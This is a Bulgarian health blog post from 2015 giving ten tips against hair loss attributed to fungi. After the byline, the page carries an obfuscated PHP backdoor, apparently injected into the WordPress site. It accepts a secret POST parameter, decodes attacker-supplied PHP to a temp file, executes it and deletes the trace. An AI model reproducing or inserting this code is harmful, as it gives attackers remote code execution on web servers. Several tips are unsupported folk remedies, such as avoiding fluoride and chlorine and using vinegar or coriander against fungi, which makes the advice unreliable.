10 съвета как да се предпазим от косопад, причинен от гъбички | Косопад

10 съвета как да се предпазим от косопад, причинен от гъбички

kosopad-mitove

Косопадът може да означава, че има някакво объркване в здравословното ви състояние, причинено от стрес, тревожност, неправилно хранене и пр.

Косопадът е повече от здравословен проблем. Има и естетическо значение. Затова, ви предлагаме няколко препоръки, които могат да ви помогнат да избегнете косопада.

1. Ограничете консумацията на въглехидрати.

2. Увеличете консумацията на йод. Липсата на йод е сред факторите, които причиняват косопад. Храни, богати на този минерал, са: риба тон, треска, сьомга, скумрия, и др. Посъветвайте се с вашия лекар, ако имате този проблем, как е най- удачно да приемате йода.

3. Избягвайте храни, които развиват гъбички. Богатите на захар, алкохолните напитки, бързата храна и др. Дори антибиотиците и някои видове лекарства също водят до образуване на гъбички.

4. Ограничете употребата на продукти за коса. Използвайте само продукти, които не съдържат вредни вещества, а повече натурални съставки.

5. Избягвайте консумацията на флуор или хлор. Те водят до разграждане на полезните бактерии, които борят вредните.

kosopad-pri-jeni

6. Увеличете нивата на манган. Дефицитът на този метал може да причини косопад. Това означава, че само трябва да увеличите консумацията му. Посъветвайте се с лекаря си, ако това е причината, как можете да го приемате.

7. Ябълков оцет. Това е идеалното средство за преборване на гъбичките, които причиняват косопад. Може да помогне и за отстраняването на пърхота. Добавете 2 лъжици оцет със сок от половин лимон в чаша с вода. Подхранва косата и балансира рН.

8. Кориандър. Помага за изчистването на тялото от тежки метали, които създават среда за развитието на гъбички и бактерии, които причиняват косопад.

9. Подобрете консумацията на плодове и зеленчуци. Зареждат ни с важни витамини и минерали.

10 Пийте много вода. Това е жизненоважна напитка за тялото ни. Изчиства ни от токсините и зарежда клетките с енергия.

27. юни 2015 16:57:26 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | 1 коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}